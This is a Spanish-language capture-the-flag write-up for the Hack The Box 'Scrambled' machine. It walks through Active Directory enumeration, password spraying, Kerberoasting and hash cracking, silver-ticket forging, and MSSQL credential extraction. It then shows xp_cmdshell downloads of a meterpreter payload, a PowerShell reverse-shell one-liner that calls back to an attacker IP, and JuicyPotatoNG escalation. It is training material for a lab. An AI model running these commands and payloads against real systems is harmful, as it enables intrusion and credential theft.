🟨HTB - Scrambled
https://app.hackthebox.com/machines/Scrambled
Información General
Nombre de la Máquina: Scrambled
IP de la Máquina: 10.129.85.148
Sistema Operativo: Windows
Dificultad: Medium
Fecha de Publicación: 11 Jun 2022
Enumeration
Ping para obtener ruta de retorno
Realizamos un ping a la máquina objetivo para verificar la conectividad y obtener información sobre la ruta utilizando la opción -R para incluir la ruta de retorno:
ping -c 1 10.129.85.148 -R
El valor de TTL (Time To Live) igual a 127 puede ser indicativo de que el sistema operativo de la máquina objetivo es Windows. El TTL es un valor en el campo de los paquetes IP que indica la duración que un paquete puede estar en una red antes de ser descartado. Windows establece por defecto el valor de TTL de sus paquetes IP en 128, que al pasar por un salto en la red se decrementa a 127.
Escaneo de puertos con Nmap
Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la máquina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mínima de paquetes y -vvv para un nivel de verbosidad alto. Además, utilizamos -n para desactivar la resolución de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra función extractPorts:
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.85.148 -oG allPorts
extractPorts allPorts
Escaneo detallado con Nmap
Posteriormente, realizamos un escaneo más detallado de los puertos identificados utilizando la opción -sCV para detección de versiones y scripts de enumeración de servicios. Específicamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:
sudo nmap -sCV -pPORTS 10.129.85.148 -oN targeted# Nmap 7.94SVN scan initiated Tue Apr 2 18:15:21 2024 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49699,49704,60649 -sCV -oN targeted 10.129.85.148
Nmap scan report for 10.129.85.148
Host is up (0.20s latency).
Bug in ms-sql-ntlm-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 22:15:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.85.148:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-02T21:44:08
|_Not valid after: 2054-04-02T21:44:08
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
60649/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/2%Time=660C8380%P=x86_64-pc-linux-gnu%r(
SF:NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORD
SF:ERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDER
SF:S_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNK
SF:NOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r
SF:\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(T
SF:LSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V
SF:1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Fou
SF:rOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMA
SF:ND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOW
SF:N_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDe
SF:sk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRA
SF:MBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,
SF:"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-04-02T22:18:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 2 18:18:50 2024 -- 1 IP address (1 host up) scanned in 208.81 seconds
Modificando /etc/hosts
Para añadir la entrada "10.129.85.148 scrm.local" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:
echo "10.129.85.148 DC1.scrm.local scrm.local" | sudo tee -a /etc/hostsUsername Bruteforce con Kerbrute
kerbrute userenum --dc dc1.scrm.local -d scrm.local -t 2000 /usr/share/seclists/Usernames/xato-net-10-milion-usernames.txt -o users
Directory Bruteforce con Dirsearch
dirsearch -u scrm.local
Analizando la pagina de scrm.local
http://scrm.local/supportrequest.html
http://scrm.local/newuser.html
http://scrm.local/salesorders.html
http://scrm.local/passwords.html
En passwords.html podemos ver que dice que la password to be the same as the username. Así que intentaré nuevamente con kerbrute para ver si la credencial que obtuve funciona.
Password Bruteforce con Kerbrute
kerbrute passwordspray -d scrm.local --dc dc1.scrm.local users ksimpson
Impacket
Ya tenemos un usuario valido, por lo que seguiremos con la enumeración con impacket
Partimos con getTGT.py
python3 getTGT.py scrm.local/ksimpson:ksimpson
export KRB5CCNAME=ksimpson.ccache
klist
Lo siguiente es utilizar GetUserSPNs.py
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass -request$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$05ba11933eb6ee366b244a4aa5faeb53$e35b1fe2314f990d3cff75cd40699be6b20df36fea2e9f15e798b57cf8777ead1ba18ec589a9052eac681dbffc8b8a7ecd81b108f5d9ba72e720356247556ef08cd784830cc0a7bbde00e1923b1886de69ed32f4d5ddac664eb055787089f5985d24cdd402969596215f35caf206a999c7648b7228bac182a5d32a90a1c003a85fe878c9eb801644ec1dbace86df05713a103fa3e153c4361f0bbc8b50e7cbf14391dc20985449a669cf2ac3a9a0c66a7248b9353a272a4db5c57764cbed74ce74fc7427d78f984b68a623336526bdd7695adf385a30d3ee3b2bc354ed92f36268b6b170ded9239d1b43fba70a01ed730bbb5e45000a5d6999cf7d9426ed704302372b4ecc6fd8e96343b128cdfaf0931b7545f0cd8439d78ef20eeea164eb2f86a390277024aa53b421a57e3a214caf63733dc73fa3195fea3ad117dce2dc6e6204b9885b7768af1cb2c1beed8cf0a06ccd71f2f9ae57c09fabbb9167c04e072a6ad3002fb08417cf8704847519b56a859b7ac8d51fc4d5b38608dc7c9aeef11f6e1c8751e3a1434e5b032a07ec5caa2703e0469fecbf75ecd0d8d6b4f197c06873b451ad5d2beb12e0c4a19dae3ce3bf47113e447793638c6445924ea69cec0e2a2d4c98a25575251494e056bab0c753746d0ff611f0391acea24756372a17632e4f8094166f4c01f1cd982179358dc70415195aec5e5bc628a4dd3a1662c62d8ae70218508c98b433362388ce7cf9dd0a787e6694cc08b9576b342929f3c7be2a633cd37cedb82c1649b0e93d1799789b2736c2dca7938b82ccbe4b272af5a5ef4c8b6a918c141152a3b953dc025e737c7d756cbad510e51a11d57148647b2cf5f2d314701758a1da79dd08ef6fddccaa999f7a4457831e552f762a90cd4e7456f685aed9e352dd77f528e0694b16136f06e5b29f9f5f8f60cb3b5e2bdd765b0af23cdf2a3c7f68578eb2b9efdf333eadf27def6e43a80474ee79dfd3ea7f42f9990b194f5b97ef6de67fa67d2ef542105a89b20e0f65b707d42151a40eaa14e5d350a3cb71d068e327c8f8d74af8aae5b192198daa723d4cbfeadb27dd311f3b36de412ba87b22ec96e6c35ed3b1b8a11412e34ec2b3cba7103a9f9c3250f8d7cbb10871a42483d2945458a7fbf8482652081dd8a7edd97f1d1c7ea9e3c21764ba2ea728c31c92e6a7d923873da8aa2180d999a973f1e6e1ee49d606f4e45184aabe5232427e986bd2906ee73173bf2862193f60e551c2e423e78495f5cf812b128fd8f6be5f354925add8d48234b868f7cfb56cf902d5cab2a6a92203547ff7e90260dcb461bd6dd1b1a5b5630e034e0ae63b26368852de50a413e9ffc6f0ee185a04289530c90a025f67b9214989dc2fc5a71f046f2fa84e4e06d8efee5bab82940517686e10df2fed6c5a2faa7ea103a3ce7b29453f3204John the ripper para crackear el hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
ksimpson:ksimpson
sqlsvc:Pegasus60:MSSQLSvc/dc1.scrm.localpython3 mssqlclient.py dc1.scrm.local -k
Por lo que intentaremos todo de nuevo (desde getTGT.py) pero ahora con las credenciales sqlsvc:Pegasus60.
python3 getTGT.py scrm.local/sqlsvc:Pegasus60
export KRB5CCNAME=sqlsvc.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
NTLM Hash
Convertimos "Pegasus60" a NTLM Hash con alguna herramienta online (browserling.com/tools/ntlm-hash)
Pegasus60:b999a16500b87d17ec7f2e2a68778f05Y la agregamos a nuestra lista de credenciales en creds.txt
getPac.py
python3 getPac.py -targetUser Administrator scrm.local/ksimpson:ksimpsonImpacket v0.11.0 - Copyright 2023 Fortra
KERB_VALIDATION_INFO
LogonTime:
dwLowDateTime: 3436097167
dwHighDateTime: 31098182
LogoffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
KickOffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
PasswordLastSet:
dwLowDateTime: 2585823167
dwHighDateTime: 30921784
PasswordCanChange:
dwLowDateTime: 3297396671
dwHighDateTime: 30921985
PasswordMustChange:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
EffectiveName: 'administrator'
FullName: ''
LogonScript: ''
ProfilePath: ''
HomeDirectory: ''
HomeDirectoryDrive: ''
LogonCount: 259
BadPasswordCount: 0
PrimaryGroupId: 513
GroupCount: 5
GroupIds:
[
RelativeId: 513
Attributes: 7 ,
RelativeId: 512
Attributes: 7 ,
RelativeId: 520
Attributes: 7 ,
RelativeId: 518
Attributes: 7 ,
RelativeId: 519
Attributes: 7 ,
]
UserFlags: 544
UserSessionKey:
Data: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
LogonServer: 'DC1'
LogonDomainName: 'SCRM'
LogonDomainId:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
LMKey: b'\x00\x00\x00\x00\x00\x00\x00\x00'
UserAccountControl: 16912
SubAuthStatus: 0
LastSuccessfulILogon:
dwLowDateTime: 0
dwHighDateTime: 0
LastFailedILogon:
dwLowDateTime: 0
dwHighDateTime: 0
FailedILogonCount: 0
Reserved3: 0
SidCount: 1
ExtraSids:
[
Sid:
Revision: 1
SubAuthorityCount: 1
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x12'
SubAuthority:
[
2,
]
Attributes: 7 ,
]
ResourceGroupDomainSid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
ResourceGroupCount: 1
ResourceGroupIds:
[
RelativeId: 572
Attributes: 536870919 ,
]
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
0000 10 00 00 00 ED F9 BD 22 BE 45 B3 80 6A 22 04 A4 .......".E..j"..Guardamos el Domain SID en nuestras lista de credenciales:
LDAP Search
ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL' | grep -i sid
Script base64SID to String
import struct, base64, sys
def o(b):return struct.unpack('B', b[0:1])[0],struct.unpack('B', b[1:2])[0],struct.unpack('>Q', b'\x00\x00'+b[2:8])[0]
def p(b, l):return [struct.unpack('<L', b[8+4*i:12+4*i])[0] for i in range(l)]
def q(v, a, s):return f"S-{v}-{a}"+''.join([f'-{x}' for x in s])
def r(s):v,l,a=o(s);assert v==1;return q(v,a,p(s,l))
def s(i=None):
if i is None:i=sys.argv[1] if len(sys.argv) > 1 else exit("Uso: python3 tosid.py base64SID")
try:print(f"SID decodificado: {r(base64.b64decode(i))}")
except Exception as e:print(f"Error: {e}")
if __name__ == "__main__":s()python3 tosid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uXVAYAAA==
grep S-1-5-21-2743207045-1827831105-2542523200 creds.txt
ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL' | less
ksimpson
ticketer.py
python3 ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local
export KRB5CCNAME=Administrator.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
Extracción de credencial en DB
SELECT name FROM sys.databases;
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.UserImport;
MiscSvc:ScrambledEggs9900
sqlsvc:Pegasus60
ksimpson:ksimpson
MSFVenom Reverse Shell
xp_cmdshell curl 10.10.15.21:8888/3434.exe -o %temp%\3434.exe
xp_cmdshell %temp%\3434.exemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3434 -f exe -o 3434.exe
python3 -m http.server 8888nc -lvnp 7777
Entonces nos damos cuenta que el privilegio SeImpersonatePrivilege esta Enabled
Lo que quiere decir que podemos efectuar una escala de privilegios con JuicyPotatoNG
Escala de privilegios con JuicyPotatoNG
Unexpected error with integration github-files: Integration is not installed on this space
cd %programdata%
curl 10.10.15.21:8888/JuicyPotatoNG.exe -o JuicyPotatoNG.exepython3 -m http.server 8888
Utilizaremos la shell Invoke-PowrShellTcpOneLine.ps1, la modificaremos (el LHOST y LPORT) y luego la dejaremos en base64. Para luego descargarla en la máquina Windows en %programdata%.
$client = New-Object System.Net.Sockets.TCPClient('10.10.15.21',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 .-w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA1AC4AMgAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=% JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA1AC4AMgAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=% cd %programdata%
curl 10.10.15.21:8888/t.bat -o t.bat
powershell
.\JuicyPotatoNG.exe -t * -p C:\ProgramData\t.batnc -nvlp 6666
Última actualización
¿Te fue útil?